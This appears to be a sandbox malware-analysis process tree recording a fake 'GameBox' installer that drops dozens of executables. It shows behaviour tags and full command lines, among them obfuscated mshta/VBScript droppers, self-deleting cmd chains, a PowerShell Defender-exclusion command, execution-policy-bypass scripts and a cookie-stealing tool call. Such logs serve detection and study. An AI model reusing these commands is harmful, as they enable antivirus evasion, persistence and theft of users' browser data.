                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                        5⤵
                                                                                        • Checks computer location settings
                                                                                        PID:5908
                                                                                        • C:\Users\Admin\Documents\ZdAd6O_apr43UI1rxt6Bts4a.exe
                                                                                          "C:\Users\Admin\Documents\ZdAd6O_apr43UI1rxt6Bts4a.exe"
                                                                                          6⤵
                                                                                            PID:6784
                                                                                            • C:\Users\Admin\Documents\ZdAd6O_apr43UI1rxt6Bts4a.exe
                                                                                              "C:\Users\Admin\Documents\ZdAd6O_apr43UI1rxt6Bts4a.exe"
                                                                                              7⤵
                                                                                                PID:8752
                                                                                            • C:\Users\Admin\Documents\f7LWuT16IsCerJgtPz32kV0v.exe
                                                                                              "C:\Users\Admin\Documents\f7LWuT16IsCerJgtPz32kV0v.exe"
                                                                                              6⤵
                                                                                                PID:6872
                                                                                              • C:\Users\Admin\Documents\IDFPeP0mRHHN0z4Ow_wyA8pV.exe
                                                                                                "C:\Users\Admin\Documents\IDFPeP0mRHHN0z4Ow_wyA8pV.exe"
                                                                                                6⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:6908
                                                                                                • C:\Users\Admin\Documents\IDFPeP0mRHHN0z4Ow_wyA8pV.exe
                                                                                                  C:\Users\Admin\Documents\IDFPeP0mRHHN0z4Ow_wyA8pV.exe
                                                                                                  7⤵
                                                                                                    PID:7440
                                                                                                • C:\Users\Admin\Documents\osp1r4oCzHWOqTN1mvGmtvnT.exe
                                                                                                  "C:\Users\Admin\Documents\osp1r4oCzHWOqTN1mvGmtvnT.exe"
                                                                                                  6⤵
                                                                                                    PID:5988
                                                                                                  • C:\Users\Admin\Documents\4z_1w24nxU0Ug3r7BVGSm7gW.exe
                                                                                                    "C:\Users\Admin\Documents\4z_1w24nxU0Ug3r7BVGSm7gW.exe"
                                                                                                    6⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:6808
                                                                                                  • C:\Users\Admin\Documents\A23F8jZO5gPS1eOlk6Wp2qwX.exe
                                                                                                    "C:\Users\Admin\Documents\A23F8jZO5gPS1eOlk6Wp2qwX.exe"
                                                                                                    6⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:6220
                                                                                                  • C:\Users\Admin\Documents\rRSnkyt8kjhmND96jbw9A7U6.exe
                                                                                                    "C:\Users\Admin\Documents\rRSnkyt8kjhmND96jbw9A7U6.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5080
                                                                                                    • C:\Users\Admin\Documents\rRSnkyt8kjhmND96jbw9A7U6.exe
                                                                                                      "C:\Users\Admin\Documents\rRSnkyt8kjhmND96jbw9A7U6.exe"
                                                                                                      7⤵
                                                                                                        PID:492
                                                                                                    • C:\Users\Admin\Documents\2xz_7zMc0QQRixxIcXqn34Fs.exe
                                                                                                      "C:\Users\Admin\Documents\2xz_7zMc0QQRixxIcXqn34Fs.exe"
                                                                                                      6⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks processor information in registry
                                                                                                      PID:7032
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 2xz_7zMc0QQRixxIcXqn34Fs.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\2xz_7zMc0QQRixxIcXqn34Fs.exe" & del C:\ProgramData\*.dll & exit
                                                                                                        7⤵
                                                                                                          PID:8328
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            8⤵
                                                                                                              PID:5800
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im 2xz_7zMc0QQRixxIcXqn34Fs.exe /f
                                                                                                              8⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4132
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              8⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:9392
                                                                                                        • C:\Users\Admin\Documents\laxzILMAGN3nA6eouYE6YeHV.exe
                                                                                                          "C:\Users\Admin\Documents\laxzILMAGN3nA6eouYE6YeHV.exe"
                                                                                                          6⤵
                                                                                                            PID:6372
                                                                                                          • C:\Users\Admin\Documents\soh_PMxZsVl4oRUFPKlDS_dD.exe
                                                                                                            "C:\Users\Admin\Documents\soh_PMxZsVl4oRUFPKlDS_dD.exe"
                                                                                                            6⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:6760
                                                                                                          • C:\Users\Admin\Documents\nks2FjRfOy31QABeDXV2_XLJ.exe
                                                                                                            "C:\Users\Admin\Documents\nks2FjRfOy31QABeDXV2_XLJ.exe"
                                                                                                            6⤵
                                                                                                              PID:5400
                                                                                                            • C:\Users\Admin\Documents\9ifDreXus70ezAciqY2u74RN.exe
                                                                                                              "C:\Users\Admin\Documents\9ifDreXus70ezAciqY2u74RN.exe"
                                                                                                              6⤵
                                                                                                                PID:6700
                                                                                                              • C:\Users\Admin\Documents\uPd4iQHxYLiA9Bnf7bUvnkwn.exe
                                                                                                                "C:\Users\Admin\Documents\uPd4iQHxYLiA9Bnf7bUvnkwn.exe"
                                                                                                                6⤵
                                                                                                                  PID:7204
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\uPd4iQHxYLiA9Bnf7bUvnkwn.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\uPd4iQHxYLiA9Bnf7bUvnkwn.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                    7⤵
                                                                                                                      PID:7784
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\uPd4iQHxYLiA9Bnf7bUvnkwn.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\uPd4iQHxYLiA9Bnf7bUvnkwn.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                        8⤵
                                                                                                                          PID:7348
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                            hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            PID:5804
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                              10⤵
                                                                                                                                PID:5336
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                  11⤵
                                                                                                                                    PID:7992
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                  10⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:6084
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill -f -iM "uPd4iQHxYLiA9Bnf7bUvnkwn.exe"
                                                                                                                                9⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:4880
                                                                                                                        • C:\Users\Admin\Documents\DVLKbe9N3Up69ekYLpTQ64o7.exe
                                                                                                                          "C:\Users\Admin\Documents\DVLKbe9N3Up69ekYLpTQ64o7.exe"
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:7240
                                                                                                                          • C:\Users\Admin\Documents\DVLKbe9N3Up69ekYLpTQ64o7.exe
                                                                                                                            "C:\Users\Admin\Documents\DVLKbe9N3Up69ekYLpTQ64o7.exe"
                                                                                                                            7⤵
                                                                                                                              PID:4920
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5292
                                                                                                                          • C:\Users\Admin\Documents\QS_NG5sNzteReWLSQwSw4T2r.exe
                                                                                                                            "C:\Users\Admin\Documents\QS_NG5sNzteReWLSQwSw4T2r.exe"
                                                                                                                            6⤵
                                                                                                                              PID:7316
                                                                                                                              • C:\Users\Admin\Documents\QS_NG5sNzteReWLSQwSw4T2r.exe
                                                                                                                                "C:\Users\Admin\Documents\QS_NG5sNzteReWLSQwSw4T2r.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:8784
                                                                                                                              • C:\Users\Admin\Documents\GUEmjBEnifo3tagsWpYgXOrl.exe
                                                                                                                                "C:\Users\Admin\Documents\GUEmjBEnifo3tagsWpYgXOrl.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:7308
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\7200174.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\7200174.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:7392
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4914639.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4914639.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                    PID:4584
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8203789.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8203789.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:7776
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        8⤵
                                                                                                                                          PID:7992
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3047813.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3047813.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:7732
                                                                                                                                      • C:\Users\Admin\Documents\uSdz_ZBboVZoRjsuMnSa25QH.exe
                                                                                                                                        "C:\Users\Admin\Documents\uSdz_ZBboVZoRjsuMnSa25QH.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:7460
                                                                                                                                        • C:\Users\Admin\Documents\uSdz_ZBboVZoRjsuMnSa25QH.exe
                                                                                                                                          C:\Users\Admin\Documents\uSdz_ZBboVZoRjsuMnSa25QH.exe
                                                                                                                                          7⤵
                                                                                                                                            PID:4712
                                                                                                                                        • C:\Users\Admin\Documents\mSP82VuTTY1qWD7Y9dd0kDjf.exe
                                                                                                                                          "C:\Users\Admin\Documents\mSP82VuTTY1qWD7Y9dd0kDjf.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:7556
                                                                                                                                          • C:\Users\Admin\Documents\yFAPYYINX25ZhwnbBNMjjbJt.exe
                                                                                                                                            "C:\Users\Admin\Documents\yFAPYYINX25ZhwnbBNMjjbJt.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            PID:7656
                                                                                                                                            • C:\Users\Admin\Documents\yFAPYYINX25ZhwnbBNMjjbJt.exe
                                                                                                                                              "C:\Users\Admin\Documents\yFAPYYINX25ZhwnbBNMjjbJt.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:7520
                                                                                                                                          • C:\Users\Admin\Documents\7leVcIAdqCAf6SEsmBWbjIzk.exe
                                                                                                                                            "C:\Users\Admin\Documents\7leVcIAdqCAf6SEsmBWbjIzk.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:7512
                                                                                                                                          • C:\Users\Admin\Documents\WdHjhTrR2GzxQBbpymqlqs88.exe
                                                                                                                                            "C:\Users\Admin\Documents\WdHjhTrR2GzxQBbpymqlqs88.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:7764
                                                                                                                                            • C:\Users\Admin\Documents\51aCnvShEY3ctu8yL6gi5LNU.exe
                                                                                                                                              "C:\Users\Admin\Documents\51aCnvShEY3ctu8yL6gi5LNU.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:7796
                                                                                                                                                • C:\Users\Admin\Documents\51aCnvShEY3ctu8yL6gi5LNU.exe
                                                                                                                                                  "C:\Users\Admin\Documents\51aCnvShEY3ctu8yL6gi5LNU.exe" -q
                                                                                                                                                  7⤵
                                                                                                                                                    PID:6952
                                                                                                                                                • C:\Users\Admin\Documents\fYJRuVInVBpD1oFsvsN0SlfI.exe
                                                                                                                                                  "C:\Users\Admin\Documents\fYJRuVInVBpD1oFsvsN0SlfI.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  PID:6848
                                                                                                                                                • C:\Users\Admin\Documents\Bcq7BKJ1CzU1vB7GIA4wP2Rw.exe
                                                                                                                                                  "C:\Users\Admin\Documents\Bcq7BKJ1CzU1vB7GIA4wP2Rw.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:6020
                                                                                                                                                  • C:\Users\Admin\Documents\2dDdFUHkOsztfEwr10dsSjIX.exe
                                                                                                                                                    "C:\Users\Admin\Documents\2dDdFUHkOsztfEwr10dsSjIX.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:8116
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\2DDDFU~1.DLL,s C:\Users\Admin\DOCUME~1\2DDDFU~1.EXE
                                                                                                                                                        7⤵
                                                                                                                                                          PID:9728
                                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\2DDDFU~1.DLL,ljldSkdQOGo=
                                                                                                                                                            8⤵
                                                                                                                                                              PID:10232
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\2DDDFU~1.DLL
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:9396
                                                                                                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\2DDDFU~1.DLL,Z0Ik
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:7828
                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                      C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:8816
                                                                                                                                                                        • C:\Windows\system32\ctfmon.exe
                                                                                                                                                                          ctfmon.exe
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:9540
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp6068.tmp.ps1"
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:8752
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpDDB3.tmp.ps1"
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:5264
                                                                                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                              "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:7584
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:2028
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:9892
                                                                                                                                                                          • C:\Users\Admin\Documents\Xcnw0KCy4XWSkn9NUiJuF0T7.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\Xcnw0KCy4XWSkn9NUiJuF0T7.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:6724
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im Xcnw0KCy4XWSkn9NUiJuF0T7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Xcnw0KCy4XWSkn9NUiJuF0T7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:8880
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill /im Xcnw0KCy4XWSkn9NUiJuF0T7.exe /f
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:4704
                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:9412
                                                                                                                                                                            • C:\Users\Admin\Documents\W1TuNxeobeDjuRm9HLpjmKhW.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\W1TuNxeobeDjuRm9HLpjmKhW.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:4532
                                                                                                                                                                              • C:\Users\Admin\Documents\W1TuNxeobeDjuRm9HLpjmKhW.exe
                                                                                                                                                                                C:\Users\Admin\Documents\W1TuNxeobeDjuRm9HLpjmKhW.exe
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:8148
                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5900
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpFFA9_tmp.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\tmpFFA9_tmp.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6312
                                                                                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                    "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:7388
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:7640
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:7980
                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                              findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:8012
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                Esplorarne.exe.com i
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                PID:8764
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:4452
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                      PID:4772
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                        PID:5008
                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                  ping RJMQBVDN -n 30
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:8816
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5832
                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5800
                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5292
                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5168
                                                                                                                                                                                      • C:\Users\Admin\Documents\23M0YSBSYQ_NZXM3axEnczh_.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\23M0YSBSYQ_NZXM3axEnczh_.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        PID:1384
                                                                                                                                                                                      • C:\Users\Admin\Documents\MXXIzgl2T9ZZRmFpVHnMF2uD.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\MXXIzgl2T9ZZRmFpVHnMF2uD.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:3712
                                                                                                                                                                                      • C:\Users\Admin\Documents\wlUQhV9ilfqfnjH3eKv9fpxU.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\wlUQhV9ilfqfnjH3eKv9fpxU.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4188
                                                                                                                                                                                      • C:\Users\Admin\Documents\CCDl8cIsufalyBQp3af0Us8l.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\CCDl8cIsufalyBQp3af0Us8l.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:2132
                                                                                                                                                                                      • C:\Users\Admin\Documents\FCOIKYc9Qv1RtDNXH2V3g_1K.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\FCOIKYc9Qv1RtDNXH2V3g_1K.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:3976
                                                                                                                                                                                      • C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:2684
                                                                                                                                                                                    • C:\Users\Admin\Documents\CCDl8cIsufalyBQp3af0Us8l.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\CCDl8cIsufalyBQp3af0Us8l.exe" -q
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:1792
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:5012
                                                                                                                                                                                    • C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\N48iw3nZjB1baMAWyOG6qthM.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4888
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                                                                      hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2240
                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4216
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
